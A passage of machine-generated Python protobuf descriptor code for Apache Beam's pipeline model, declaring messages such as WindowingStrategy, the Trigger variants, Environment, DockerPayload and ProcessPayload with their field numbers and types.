options=None),
_descriptor.FieldDescriptor(
name='windowed_writes', full_name='org.apache.beam.model.pipeline.v1.WriteFilesPayload.windowed_writes', index=2,
number=3, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='runner_determined_sharding', full_name='org.apache.beam.model.pipeline.v1.WriteFilesPayload.runner_determined_sharding', index=3,
number=4, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='side_inputs', full_name='org.apache.beam.model.pipeline.v1.WriteFilesPayload.side_inputs', index=4,
number=5, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[_WRITEFILESPAYLOAD_SIDEINPUTSENTRY, ],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=6900,
serialized_end=7311,
)
_CODER = _descriptor.Descriptor(
name='Coder',
full_name='org.apache.beam.model.pipeline.v1.Coder',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='spec', full_name='org.apache.beam.model.pipeline.v1.Coder.spec', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='component_coder_ids', full_name='org.apache.beam.model.pipeline.v1.Coder.component_coder_ids', index=1,
number=2, type=9, cpp_type=9, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=7313,
serialized_end=7415,
)
_STANDARDCODERS = _descriptor.Descriptor(
name='StandardCoders',
full_name='org.apache.beam.model.pipeline.v1.StandardCoders',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
],
extensions=[
],
nested_types=[],
enum_types=[
_STANDARDCODERS_ENUM,
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=7418,
serialized_end=7857,
)
_WINDOWINGSTRATEGY = _descriptor.Descriptor(
name='WindowingStrategy',
full_name='org.apache.beam.model.pipeline.v1.WindowingStrategy',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='window_fn', full_name='org.apache.beam.model.pipeline.v1.WindowingStrategy.window_fn', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='merge_status', full_name='org.apache.beam.model.pipeline.v1.WindowingStrategy.merge_status', index=1,
number=2, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='window_coder_id', full_name='org.apache.beam.model.pipeline.v1.WindowingStrategy.window_coder_id', index=2,
number=3, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='trigger', full_name='org.apache.beam.model.pipeline.v1.WindowingStrategy.trigger', index=3,
number=4, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='accumulation_mode', full_name='org.apache.beam.model.pipeline.v1.WindowingStrategy.accumulation_mode', index=4,
number=5, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='output_time', full_name='org.apache.beam.model.pipeline.v1.WindowingStrategy.output_time', index=5,
number=6, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='closing_behavior', full_name='org.apache.beam.model.pipeline.v1.WindowingStrategy.closing_behavior', index=6,
number=7, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='allowed_lateness', full_name='org.apache.beam.model.pipeline.v1.WindowingStrategy.allowed_lateness', index=7,
number=8, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='OnTimeBehavior', full_name='org.apache.beam.model.pipeline.v1.WindowingStrategy.OnTimeBehavior', index=8,
number=9, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='assigns_to_one_window', full_name='org.apache.beam.model.pipeline.v1.WindowingStrategy.assigns_to_one_window', index=9,
number=10, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=7860,
serialized_end=8489,
)
_MERGESTATUS = _descriptor.Descriptor(
name='MergeStatus',
full_name='org.apache.beam.model.pipeline.v1.MergeStatus',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
],
extensions=[
],
nested_types=[],
enum_types=[
_MERGESTATUS_ENUM,
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=8491,
serialized_end=8583,
)
_ACCUMULATIONMODE = _descriptor.Descriptor(
name='AccumulationMode',
full_name='org.apache.beam.model.pipeline.v1.AccumulationMode',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
],
extensions=[
],
nested_types=[],
enum_types=[
_ACCUMULATIONMODE_ENUM,
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=8585,
serialized_end=8662,
)
_CLOSINGBEHAVIOR = _descriptor.Descriptor(
name='ClosingBehavior',
full_name='org.apache.beam.model.pipeline.v1.ClosingBehavior',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
],
extensions=[
],
nested_types=[],
enum_types=[
_CLOSINGBEHAVIOR_ENUM,
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=8664,
serialized_end=8745,
)
_ONTIMEBEHAVIOR = _descriptor.Descriptor(
name='OnTimeBehavior',
full_name='org.apache.beam.model.pipeline.v1.OnTimeBehavior',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
],
extensions=[
],
nested_types=[],
enum_types=[
_ONTIMEBEHAVIOR_ENUM,
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=8747,
serialized_end=8827,
)
_OUTPUTTIME = _descriptor.Descriptor(
name='OutputTime',
full_name='org.apache.beam.model.pipeline.v1.OutputTime',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
],
extensions=[
],
nested_types=[],
enum_types=[
_OUTPUTTIME_ENUM,
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=8829,
serialized_end=8927,
)
_TIMEDOMAIN = _descriptor.Descriptor(
name='TimeDomain',
full_name='org.apache.beam.model.pipeline.v1.TimeDomain',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
],
extensions=[
],
nested_types=[],
enum_types=[
_TIMEDOMAIN_ENUM,
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=8929,
serialized_end=9037,
)
_TRIGGER_AFTERALL = _descriptor.Descriptor(
name='AfterAll',
full_name='org.apache.beam.model.pipeline.v1.Trigger.AfterAll',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='subtriggers', full_name='org.apache.beam.model.pipeline.v1.Trigger.AfterAll.subtriggers', index=0,
number=1, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=10020,
serialized_end=10095,
)
_TRIGGER_AFTERANY = _descriptor.Descriptor(
name='AfterAny',
full_name='org.apache.beam.model.pipeline.v1.Trigger.AfterAny',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='subtriggers', full_name='org.apache.beam.model.pipeline.v1.Trigger.AfterAny.subtriggers', index=0,
number=1, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=10097,
serialized_end=10172,
)
_TRIGGER_AFTEREACH = _descriptor.Descriptor(
name='AfterEach',
full_name='org.apache.beam.model.pipeline.v1.Trigger.AfterEach',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='subtriggers', full_name='org.apache.beam.model.pipeline.v1.Trigger.AfterEach.subtriggers', index=0,
number=1, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=10174,
serialized_end=10250,
)
_TRIGGER_AFTERENDOFWINDOW = _descriptor.Descriptor(
name='AfterEndOfWindow',
full_name='org.apache.beam.model.pipeline.v1.Trigger.AfterEndOfWindow',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='early_firings', full_name='org.apache.beam.model.pipeline.v1.Trigger.AfterEndOfWindow.early_firings', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='late_firings', full_name='org.apache.beam.model.pipeline.v1.Trigger.AfterEndOfWindow.late_firings', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=10253,
serialized_end=10404,
)
_TRIGGER_AFTERPROCESSINGTIME = _descriptor.Descriptor(
name='AfterProcessingTime',
full_name='org.apache.beam.model.pipeline.v1.Trigger.AfterProcessingTime',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='timestamp_transforms', full_name='org.apache.beam.model.pipeline.v1.Trigger.AfterProcessingTime.timestamp_transforms', index=0,
number=1, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=10406,
serialized_end=10512,
)
_TRIGGER_AFTERSYNCHRONIZEDPROCESSINGTIME = _descriptor.Descriptor(
name='AfterSynchronizedProcessingTime',
full_name='org.apache.beam.model.pipeline.v1.Trigger.AfterSynchronizedProcessingTime',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=10514,
serialized_end=10547,
)
_TRIGGER_DEFAULT = _descriptor.Descriptor(
name='Default',
full_name='org.apache.beam.model.pipeline.v1.Trigger.Default',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=10549,
serialized_end=10558,
)
_TRIGGER_ELEMENTCOUNT = _descriptor.Descriptor(
name='ElementCount',
full_name='org.apache.beam.model.pipeline.v1.Trigger.ElementCount',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='element_count', full_name='org.apache.beam.model.pipeline.v1.Trigger.ElementCount.element_count', index=0,
number=1, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=10560,
serialized_end=10597,
)
_TRIGGER_NEVER = _descriptor.Descriptor(
name='Never',
full_name='org.apache.beam.model.pipeline.v1.Trigger.Never',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=10599,
serialized_end=10606,
)
_TRIGGER_ALWAYS = _descriptor.Descriptor(
name='Always',
full_name='org.apache.beam.model.pipeline.v1.Trigger.Always',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=10608,
serialized_end=10616,
)
_TRIGGER_ORFINALLY = _descriptor.Descriptor(
name='OrFinally',
full_name='org.apache.beam.model.pipeline.v1.Trigger.OrFinally',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='main', full_name='org.apache.beam.model.pipeline.v1.Trigger.OrFinally.main', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='finally', full_name='org.apache.beam.model.pipeline.v1.Trigger.OrFinally.finally', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=10619,
serialized_end=10749,
)
_TRIGGER_REPEAT = _descriptor.Descriptor(
name='Repeat',
full_name='org.apache.beam.model.pipeline.v1.Trigger.Repeat',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='subtrigger', full_name='org.apache.beam.model.pipeline.v1.Trigger.Repeat.subtrigger', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=10751,
serialized_end=10823,
)
_TRIGGER = _descriptor.Descriptor(
name='Trigger',
full_name='org.apache.beam.model.pipeline.v1.Trigger',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='after_all', full_name='org.apache.beam.model.pipeline.v1.Trigger.after_all', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='after_any', full_name='org.apache.beam.model.pipeline.v1.Trigger.after_any', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='after_each', full_name='org.apache.beam.model.pipeline.v1.Trigger.after_each', index=2,
number=3, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='after_end_of_window', full_name='org.apache.beam.model.pipeline.v1.Trigger.after_end_of_window', index=3,
number=4, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='after_processing_time', full_name='org.apache.beam.model.pipeline.v1.Trigger.after_processing_time', index=4,
number=5, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='after_synchronized_processing_time', full_name='org.apache.beam.model.pipeline.v1.Trigger.after_synchronized_processing_time', index=5,
number=6, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='always', full_name='org.apache.beam.model.pipeline.v1.Trigger.always', index=6,
number=12, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='default', full_name='org.apache.beam.model.pipeline.v1.Trigger.default', index=7,
number=7, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='element_count', full_name='org.apache.beam.model.pipeline.v1.Trigger.element_count', index=8,
number=8, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='never', full_name='org.apache.beam.model.pipeline.v1.Trigger.never', index=9,
number=9, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='or_finally', full_name='org.apache.beam.model.pipeline.v1.Trigger.or_finally', index=10,
number=10, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='repeat', full_name='org.apache.beam.model.pipeline.v1.Trigger.repeat', index=11,
number=11, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[_TRIGGER_AFTERALL, _TRIGGER_AFTERANY, _TRIGGER_AFTEREACH, _TRIGGER_AFTERENDOFWINDOW, _TRIGGER_AFTERPROCESSINGTIME, _TRIGGER_AFTERSYNCHRONIZEDPROCESSINGTIME, _TRIGGER_DEFAULT, _TRIGGER_ELEMENTCOUNT, _TRIGGER_NEVER, _TRIGGER_ALWAYS, _TRIGGER_ORFINALLY, _TRIGGER_REPEAT, ],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
_descriptor.OneofDescriptor(
name='trigger', full_name='org.apache.beam.model.pipeline.v1.Trigger.trigger',
index=0, containing_type=None, fields=[]),
],
serialized_start=9040,
serialized_end=10834,
)
_TIMESTAMPTRANSFORM_DELAY = _descriptor.Descriptor(
name='Delay',
full_name='org.apache.beam.model.pipeline.v1.TimestampTransform.Delay',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='delay_millis', full_name='org.apache.beam.model.pipeline.v1.TimestampTransform.Delay.delay_millis', index=0,
number=1, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=11020,
serialized_end=11049,
)
_TIMESTAMPTRANSFORM_ALIGNTO = _descriptor.Descriptor(
name='AlignTo',
full_name='org.apache.beam.model.pipeline.v1.TimestampTransform.AlignTo',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='period', full_name='org.apache.beam.model.pipeline.v1.TimestampTransform.AlignTo.period', index=0,
number=3, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='offset', full_name='org.apache.beam.model.pipeline.v1.TimestampTransform.AlignTo.offset', index=1,
number=4, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=11051,
serialized_end=11092,
)
_TIMESTAMPTRANSFORM = _descriptor.Descriptor(
name='TimestampTransform',
full_name='org.apache.beam.model.pipeline.v1.TimestampTransform',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='delay', full_name='org.apache.beam.model.pipeline.v1.TimestampTransform.delay', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='align_to', full_name='org.apache.beam.model.pipeline.v1.TimestampTransform.align_to', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[_TIMESTAMPTRANSFORM_DELAY, _TIMESTAMPTRANSFORM_ALIGNTO, ],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
_descriptor.OneofDescriptor(
name='timestamp_transform', full_name='org.apache.beam.model.pipeline.v1.TimestampTransform.timestamp_transform',
index=0, containing_type=None, fields=[]),
],
serialized_start=10837,
serialized_end=11115,
)
_SIDEINPUT = _descriptor.Descriptor(
name='SideInput',
full_name='org.apache.beam.model.pipeline.v1.SideInput',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='access_pattern', full_name='org.apache.beam.model.pipeline.v1.SideInput.access_pattern', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='view_fn', full_name='org.apache.beam.model.pipeline.v1.SideInput.view_fn', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='window_mapping_fn', full_name='org.apache.beam.model.pipeline.v1.SideInput.window_mapping_fn', index=2,
number=3, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=11118,
serialized_end=11350,
)
_ENVIRONMENT = _descriptor.Descriptor(
name='Environment',
full_name='org.apache.beam.model.pipeline.v1.Environment',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='url', full_name='org.apache.beam.model.pipeline.v1.Environment.url', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='urn', full_name='org.apache.beam.model.pipeline.v1.Environment.urn', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='payload', full_name='org.apache.beam.model.pipeline.v1.Environment.payload', index=2,
number=3, type=12, cpp_type=9, label=1,
has_default_value=False, default_value=_b(""),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=11352,
serialized_end=11408,
)
_STANDARDENVIRONMENTS = _descriptor.Descriptor(
name='StandardEnvironments',
full_name='org.apache.beam.model.pipeline.v1.StandardEnvironments',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
],
extensions=[
],
nested_types=[],
enum_types=[
_STANDARDENVIRONMENTS_ENVIRONMENTS,
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=11411,
serialized_end=11570,
)
_DOCKERPAYLOAD = _descriptor.Descriptor(
name='DockerPayload',
full_name='org.apache.beam.model.pipeline.v1.DockerPayload',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='container_image', full_name='org.apache.beam.model.pipeline.v1.DockerPayload.container_image', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=11572,
serialized_end=11612,
)
_PROCESSPAYLOAD_ENVENTRY = _descriptor.Descriptor(
name='EnvEntry',
full_name='org.apache.beam.model.pipeline.v1.ProcessPayload.EnvEntry',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='key', full_name='org.apache.beam.model.pipeline.v1.ProcessPayload.EnvEntry.key', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='value', full_name='org.apache.beam.model.pipeline.v1.ProcessPayload.EnvEntry.value', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=_descriptor._ParseOptions(descriptor_pb2.MessageOptions(), _b('8\001')),
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=11749,
serialized_end=11791,
)
_PROCESSPAYLOAD = _descriptor.Descriptor(
name='ProcessPayload',
full_name='org.apache.beam.model.pipeline.v1.ProcessPayload',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='os', full_name='org.apache.beam.model.pipeline.v1.ProcessPayload.os', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='arch', full_name='org.apache.beam.model.pipeline.v1.ProcessPayload.arch', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='command', full_name='org.apache.beam.model.pipeline.v1.ProcessPayload.command', index=2,
number=3, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='env', full_name='org.apache.beam.model.pipeline.v1.ProcessPayload.env', index=3,
number=4, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[_PROCESSPAYLOAD_ENVENTRY, ],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=11615,
serialized_end=11791,
)
_SDKFUNCTIONSPEC = _descriptor.Descriptor(
name='SdkFunctionSpec',
full_name='org.apache.beam.model.pipeline.v1.SdkFunctionSpec',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='spec', full_name='org.apache.beam.model.pipeline.v1.SdkFunctionSpec.spec', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='environment_id', full_name='org.apache.beam.model.pipeline.v1.SdkFunctionSpec.environment_id', index=1,
number=2, type=9, cpp_type=9, label=1,
